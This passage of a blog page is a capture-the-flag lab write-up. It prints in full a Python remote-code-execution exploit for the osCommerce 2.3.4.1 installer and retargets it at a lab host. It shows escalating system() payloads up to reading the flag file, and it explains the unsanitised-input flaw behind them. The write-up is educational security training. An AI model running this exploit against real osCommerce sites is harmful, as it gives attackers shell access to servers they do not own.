\"https://dev-to-uploads.s3.amazonaws.com/i/qsi5s2rcjfv4lh5836j5.png\",\n \"alt\": \"phpinfo page\"\n }))), mdx(\"p\", null, \"Oops! It\\u2019s not PHP/7.0.2 rather it\\u2019s PHP/5.5.9, so our exploit won\\u2019t work here. \"), mdx(\"h3\", {\n \"id\": \"get-back-to-basics\"\n }, \"Get back to basics\"), mdx(\"p\", null, \"Now let\\u2019s try out our recon phase again.\\nI started looking at the website at this point. Initially I thought osCommerce is the name of the store but then if you look at the footer of the website you will find something interesting, It says \", mdx(\"strong\", {\n parentName: \"p\"\n }, \"Powered by osCommerce\"), \". Now a quick Google search reveals that \", mdx(\"strong\", {\n parentName: \"p\"\n }, \"osCommerce is an e-commerce and online store-management software program\"), \". Now let us again dive back to exploit-db and search for vulnerabilities with osCommerce (Application level vulnerability) and you find this.\"), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/00oa6vj8e6kzeoijsajd.png\",\n \"alt\": \"oscommerce vulns\"\n }))), mdx(\"p\", null, \"Let\\u2019s try out the fourth vulnerability that is listed in the image above. The following exploit code is found along with the vulnerability.\"), mdx(\"pre\", null, mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-python\"\n }), \"\\nimport requests\\n\\n# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)\\nbase_url = \\\"http://localhost//oscommerce-2.3.4.1/catalog/\\\"\\ntarget_url = \\\"http://localhost/oscommerce-2.3.4.1/catalog/install/install.php?step=4\\\"\\n\\ndata = {\\n 'DIR_FS_DOCUMENT_ROOT': './'\\n}\\n\\n# the payload will be injected into the configuration file via this code\\n# ' define(\\\\'DB_DATABASE\\\\', \\\\'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\\\\');' . \\\"\\\\n\\\" .\\n# so the format for the exploit will be: '); PAYLOAD; /*\\n\\npayload = '\\\\');'\\npayload += 'system(\\\"ls\\\");' # this is where you enter you PHP payload\\npayload += '/*'\\n\\ndata['DB_DATABASE'] = payload\\n\\n# exploit it\\nr = requests.post(url=target_url, data=data)\\n\\nif r.status_code == 200:\\n print(\\\"[+] Successfully launched the exploit. Open the following URL to execute your code\\\\n\\\\n\\\" + base_url + \\\"install/includes/configure.php\\\")\\nelse:\\n print(\\\"[-] Exploit did not execute as planned\\\")\\n \\n\")), mdx(\"p\", null, \"Now in the above exploit code I replaced the target url to the lab url and it should look like this.\"), mdx(\"pre\", null, mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-python\"\n }), \"import requests\\n\\n# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)\\nbase_url = \\\"http://l4eowcwhoggdly42685x49mzl.ctf-india.attackdefenselabs.com\\\"\\ntarget_url = \\\"http://l4eowcwhoggdly42685x49mzl.ctf-india.attackdefenselabs.com/install/install.php?step=4\\\"\\n\\ndata = {\\n 'DIR_FS_DOCUMENT_ROOT': './'\\n}\\n\\n# the payload will be injected into the configuration file via this code\\n# ' define(\\\\'DB_DATABASE\\\\', \\\\'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\\\\');' . \\\"\\\\n\\\" .\\n# so the format for the exploit will be: '); PAYLOAD; /*\\n\\npayload = '\\\\');'\\npayload += 'system(\\\"ls\\\");' # this is where you enter you PHP payload\\npayload += '/*'\\n\\ndata['DB_DATABASE'] = payload\\n\\n# exploit it\\nr = requests.post(url=target_url, data=data)\\n\\nif r.status_code == 200:\\n print(\\\"[+] Successfully launched the exploit. Open the following URL to execute your code\\\\n\\\\n\\\" + base_url + \\\"install/includes/configure.php\\\")\\nelse:\\n print(\\\"[-] Exploit did not execute as planned\\\")\\n \\n\")), mdx(\"p\", null, \"Now let us run the exploit.\"), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/5svf0dvxe8qumfs71w8p.png\",\n \"alt\": \"exploit output\"\n }))), mdx(\"p\", null, \"The output in the terminal says the exploit was successful, buts let\\u2019s checkout if it actually works.\"), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/7lgwomfd4oy5h50mirc6.png\",\n \"alt\": \"shell output 1\"\n }))), mdx(\"p\", null, \"Opening the link that was printed on the console actually runs the ls command on the server. Now we have shell access to the application that allows us to perform RCE(Remote Code Execution). Now let us change the command from the exploit code and let us try to find the flag file on the server.\"), mdx(\"ul\", null, mdx(\"li\", {\n parentName: \"ul\"\n }, mdx(\"strong\", {\n parentName: \"li\"\n }, \"Try 1\"), \": cd to the root of the server and check if there are any interesting files or folders.\")), mdx(\"blockquote\", null, mdx(\"p\", {\n parentName: \"blockquote\"\n }, \"I have changed the payload to the following\"), mdx(\"pre\", {\n parentName: \"blockquote\"\n }, mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-python\"\n }), \"payload += 'system(\\\"cd / && ls\\\");' # this is where you enter you PHP \\n\")), mdx(\"p\", {\n parentName: \"blockquote\"\n }, \"Run the exploit again and check the output.\")), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/z1myqizn0mljk8h09okw.png\",\n \"alt\": \"shell output 2\"\n }))), mdx(\"p\", null, \"The app folder looks interesting. Change the payload in the exploit, list the files in the folder and you should find a flag file. print out the flag file to get your flag.\"), mdx(\"p\", null, \"Our final payload looks like this.\"), mdx(\"pre\", null, mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-python\"\n }), \"payload += 'system(\\\"cat /app/flag*\\\");' # this is where you enter you PHP payload\\n\")), mdx(\"p\", null, \"There you go, your flag which is a md5 hash.\"), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/luk19ts6b145ejvr3ki7.png\",\n \"alt\": \"flag\"\n }))), mdx(\"h2\", {\n \"id\": \"bingo-we-just-solved-our-first-lab\"\n }, \"Bingo\\uD83C\\uDF89, we just solved our first lab.\"), mdx(\"h1\", {\n \"id\": \"let-us-try-to-understand-what-just-happened\"\n }, \"Let us try to understand what just happened\"), mdx(\"p\", null, \"I you look back at the exploit code you will see that we are just sending a post request with a crafted payload. So I downloaded the source code of osCommerce(you can find it \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://www.oscommerce.com/Products\",\n \"target\": \"_blank\",\n \"rel\": \"noreferrer\"\n }), \"here\"), \") and the problem lies with the osCommerce installation process.\"), mdx(\"p\", null, \"So the problem is osCommerce doesn\\u2019t put a check on if the app is already installed, this will allow the attacker to access the installation process again and reconfigure the site without having any user level access. In the payload we are sending the post request to \", mdx(\"strong\", {\n parentName: \"p\"\n }, \"step 4\"), \" because in step 4 of the installation process we are asked to configure the database and rest of the information and is written to the \", mdx(\"inlineCode\", {\n parentName: \"p\"\n }, \"install/includes/configure.php\"), \". And the major problem here is that the input provided by user is not sanitized, this allows attacker to send crafted input as we did in the exploit above which allows us to inject the system command into the configure.php file. So when you open the configure.php file from your browser the system command that was injected gets executed and thus we have remote shell access to the server. This marks the end of this lab.\"), mdx(\"h1\", {\n \"id\": \"happy-hacking-\"\n }, \"Happy hacking \\uD83D\\uDC68\\u200D\\uD83D\\uDCBB\"), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://i.giphy.com/media/l3vRmVv5P01I5NDAA/giphy.gif\",\n \"alt\": \"happy hacking\"\n }))));\n}\n;\nMDXContent.isMDXComponent = true;","hero":{"full":{"base64":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAA7EAAAOxAGVKw4bAAACwklEQVQoz1WSW0jTcRTH/1QPFfTSW2+9FT2UIEhEZHiZ5iXN7jryQkYRoYVuc0t0aDa1IC3NpHSmpdJcXrPLUudlirllpVJhd42uLwaRlft0/mNBPXw55/z/v/M9t69CfgIU7cebGwslyYIUvKe1eE/GgD4cryFCoPEjAnShfDQnMn7lFLN1RXy+auFTfTEfak/xLScGBb081IWBmpAdihqjJhqjwBT9H7wmKWoIx11ygnLHCC19w7Sp6B/F7hhgxpAghDmRLORs8z2cNe2ipruTDmcProFeBgUDftuv+v29DA05aelop66phfobrTTe7KLe1k7ttWZmDTtQvIZIfvkINbiNu1nmHCXw8XOip6bJfDlDwtOXaCanWeuZIunZK4ImX7Cyw4Gt666PzFRoodJ6nQZbGzP6eLVDGU8vI2cF45YPi3pdKENuVo8+Imh8ko2C2KnnbPBMsMLlZtGwh5Vtt2nqvEdZdS0NVWXYW2zUNNl5r3a4IB1+yd8PhVo8hYdY7BhEkZ0ozgcovYK+MZY4hcg5JvEwyqCH5d1OzGfK0Kal4+npkrUMcLGuUUaWDucM0ejuOiideEru0AjrZIw1nffZJ5XLLRlYSrMpKc2iqCgDw6VKdBeKMZ+3sD0phYDAQBK1WqprrFRctvJOF4fyVQiXt3VLZTebH04SMPYIxfWEknMmyAySdaiXD4GjQbxx9fGj08qrvFT2HMlk05ZgImLj0OfmYZUj+XaoEi5tvyMk46x3T7Bq+KGQP0ZXni973cp3YzQ/RUK/RZOfCw/wzbwXT8FhiqusxMXHE6YJ52xFNQ3NdiGUDudlh7fykmktOEhzfip2cxq2gnSmjDt9l18QWam69KpW1at0PKeL8knk9fFtTB8L521WDDPZsczrI/9eWcbShfjH8/uiS++/ZH7r89Uc+Y9RrEmNNX5E8Af2mVv3o7p9dwAAAABJRU5ErkJggg==","aspectRatio":1.7777777777777777,"src":"/static/8d48637e90d60e8ef5bd8d332922de90/f4f8c/hero.png","srcSet":"/static/8d48637e90d60e8ef5bd8d332922de90/206f6/hero.png 236w,\n/static/8d48637e90d60e8ef5bd8d332922de90/84032/hero.png 472w,\n/static/8d48637e90d60e8ef5bd8d332922de90/f4f8c/hero.png 944w,\n/static/8d48637e90d60e8ef5bd8d332922de90/513fc/hero.png 1416w,\n/static/8d48637e90d60e8ef5bd8d332922de90/6eada/hero.png 1888w,\n/static/8d48637e90d60e8ef5bd8d332922de90/a028c/hero.png 2560w","srcWebp":"/static/8d48637e90d60e8ef5bd8d332922de90/99fbb/hero.webp","srcSetWebp":"/static/8d48637e90d60e8ef5bd8d332922de90/77392/hero.webp 236w,\n/static/8d48637e90d60e8ef5bd8d332922de90/1f177/hero.webp 472w,\n/static/8d48637e90d60e8ef5bd8d332922de90/99fbb/hero.webp 944w,\n/static/8d48637e90d60e8ef5bd8d332922de90/4a492/hero.webp 1416w,\n/static/8d48637e90d60e8ef5bd8d332922de90/b0b8f/hero.webp 1888w,\n/static/8d48637e90d60e8ef5bd8d332922de90/22dcf/hero.webp 2560w","sizes":"(max-width: 944px) 100vw, 944px"},"regular":{"base64":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAA7EAAAOxAGVKw4bAAACwklEQVQoz1WSW0jTcRTH/1QPFfTSW2+9FT2UIEhEZHiZ5iXN7jryQkYRoYVuc0t0aDa1IC3NpHSmpdJcXrPLUudlirllpVJhd42uLwaRlft0/mNBPXw55/z/v/M9t69CfgIU7cebGwslyYIUvKe1eE/GgD4cryFCoPEjAnShfDQnMn7lFLN1RXy+auFTfTEfak/xLScGBb081IWBmpAdihqjJhqjwBT9H7wmKWoIx11ygnLHCC19w7Sp6B/F7hhgxpAghDmRLORs8z2cNe2ipruTDmcProFeBgUDftuv+v29DA05aelop66phfobrTTe7KLe1k7ttWZmDTtQvIZIfvkINbiNu1nmHCXw8XOip6bJfDlDwtOXaCanWeuZIunZK4ImX7Cyw4Gt666PzFRoodJ6nQZbGzP6eLVDGU8vI2cF45YPi3pdKENuVo8+Imh8ko2C2KnnbPBMsMLlZtGwh5Vtt2nqvEdZdS0NVWXYW2zUNNl5r3a4IB1+yd8PhVo8hYdY7BhEkZ0ozgcovYK+MZY4hcg5JvEwyqCH5d1OzGfK0Kal4+npkrUMcLGuUUaWDucM0ejuOiideEru0AjrZIw1nffZJ5XLLRlYSrMpKc2iqCgDw6VKdBeKMZ+3sD0phYDAQBK1WqprrFRctvJOF4fyVQiXt3VLZTebH04SMPYIxfWEknMmyAySdaiXD4GjQbxx9fGj08qrvFT2HMlk05ZgImLj0OfmYZUj+XaoEi5tvyMk46x3T7Bq+KGQP0ZXni973cp3YzQ/RUK/RZOfCw/wzbwXT8FhiqusxMXHE6YJ52xFNQ3NdiGUDudlh7fykmktOEhzfip2cxq2gnSmjDt9l18QWam69KpW1at0PKeL8knk9fFtTB8L521WDDPZsczrI/9eWcbShfjH8/uiS++/ZH7r89Uc+Y9RrEmNNX5E8Af2mVv3o7p9dwAAAABJRU5ErkJggg==","aspectRatio":1.7777777777777777,"src":"/static/8d48637e90d60e8ef5bd8d332922de90/3e3e7/hero.png","srcSet":"/static/8d48637e90d60e8ef5bd8d332922de90/a123b/hero.png 163w,\n/static/8d48637e90d60e8ef5bd8d332922de90/b6f5d/hero.png 327w,\n/static/8d48637e90d60e8ef5bd8d332922de90/3e3e7/hero.png 653w,\n/static/8d48637e90d60e8ef5bd8d332922de90/de899/hero.png 980w,\n/static/8d48637e90d60e8ef5bd8d332922de90/00f25/hero.png 1306w,\n/static/8d48637e90d60e8ef5bd8d332922de90/a028c/hero.png 2560w","srcWebp":"/static/8d48637e90d60e8ef5bd8d332922de90/0acdf/hero.webp","srcSetWebp":"/static/8d48637e90d60e8ef5bd8d332922de90/ac59e/hero.webp 163w,\n/static/8d48637e90d60e8ef5bd8d332922de90/7660b/hero.webp 327w,\n/static/8d48637e90d60e8ef5bd8d332922de90/0acdf/hero.webp 653w,\n/static/8d48637e90d60e8ef5bd8d332922de90/75470/hero.webp 980w,\n/static/8d48637e90d60e8ef5bd8d332922de90/68d47/hero.webp 1306w,\n/static/8d48637e90d60e8ef5bd8d332922de90/22dcf/hero.webp 2560w","sizes":"(max-width: 653px) 100vw, 653px"},"narrow":{"base64":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAA7EAAAOxAGVKw4bAAACwklEQVQoz1WSW0jTcRTH/1QPFfTSW2+9FT2UIEhEZHiZ5iXN7jryQkYRoYVuc0t0aDa1IC3NpHSmpdJcXrPLUudlirllpVJhd42uLwaRlft0/mNBPXw55/z/v/M9t69CfgIU7cebGwslyYIUvKe1eE/GgD4cryFCoPEjAnShfDQnMn7lFLN1RXy+auFTfTEfak/xLScGBb081IWBmpAdihqjJhqjwBT9H7wmKWoIx11ygnLHCC19w7Sp6B/F7hhgxpAghDmRLORs8z2cNe2ipruTDmcProFeBgUDftuv+v29DA05aelop66phfobrTTe7KLe1k7ttWZmDTtQvIZIfvkINbiNu1nmHCXw8XOip6bJfDlDwtOXaCanWeuZIunZK4ImX7Cyw4Gt666PzFRoodJ6nQZbGzP6eLVDGU8vI2cF45YPi3pdKENuVo8+Imh8ko2C2KnnbPBMsMLlZtGwh5Vtt2nqvEdZdS0NVWXYW2zUNNl5r3a4IB1+yd8PhVo8hYdY7BhEkZ0ozgcovYK+MZY4hcg5JvEwyqCH5d1OzGfK0Kal4+npkrUMcLGuUUaWDucM0ejuOiideEru0AjrZIw1nffZJ5XLLRlYSrMpKc2iqCgDw6VKdBeKMZ+3sD0phYDAQBK1WqprrFRctvJOF4fyVQiXt3VLZTebH04SMPYIxfWEknMmyAySdaiXD4GjQbxx9fGj08qrvFT2HMlk05ZgImLj0OfmYZUj+XaoEi5tvyMk46x3T7Bq+KGQP0ZXni973cp3YzQ/RUK/RZOfCw/wzbwXT8FhiqusxMXHE6YJ52xFNQ3NdiGUDudlh7fykmktOEhzfip2cxq2gnSmjDt9l18QWam69KpW1at0PKeL8knk9fFtTB8L521WDDPZsczrI/9eWcbShfjH8/uiS++/ZH7r89Uc+Y9RrEmNNX5E8Af2mVv3o7p9dwAAAABJRU5ErkJggg==","aspectRatio":1.7777777777777777,"src":"/static/8d48637e90d60e8ef5bd8d332922de90/f156e/hero.png","srcSet":"/static/8d48637e90d60e8ef5bd8d332922de90/f2848/hero.png 114w,\n/static/8d48637e90d60e8ef5bd8d332922de90/42f31/hero.png 229w,\n/static/8d48637e90d60e8ef5bd8d332922de90/f156e/hero.png 457w,\n/static/8d48637e90d60e8ef5bd8d332922de90/cf471/hero.png 686w,\n/static/8d48637e90d60e8ef5bd8d332922de90/3bc69/hero.png 914w,\n/static/8d48637e90d60e8ef5bd8d332922de90/a028c/hero.png 2560w","srcWebp":"/static/8d48637e90d60e8ef5bd8d332922de90/15384/hero.webp","srcSetWebp":"/static/8d48637e90d60e8ef5bd8d332922de90/31fce/hero.webp 114w,\n/static/8d48637e90d60e8ef5bd8d332922de90/e3e25/hero.webp 229w,\n/static/8d48637e90d60e8ef5bd8d332922de90/15384/hero.webp 457w,\n/static/8d48637e90d60e8ef5bd8d332922de90/0258d/hero.webp 686w,\n/static/8d48637e90d60e8ef5bd8d332922de90/64ea2/hero.webp 914w,\n/static/8d48637e90d60e8ef5bd8d332922de90/22dcf/hero.webp 2560w","sizes":"(max-width: 457px) 100vw, 457px"},"seo":{"src":"/static/8d48637e90d60e8ef5bd8d332922de90/7ef28/hero.png"}}}]}}}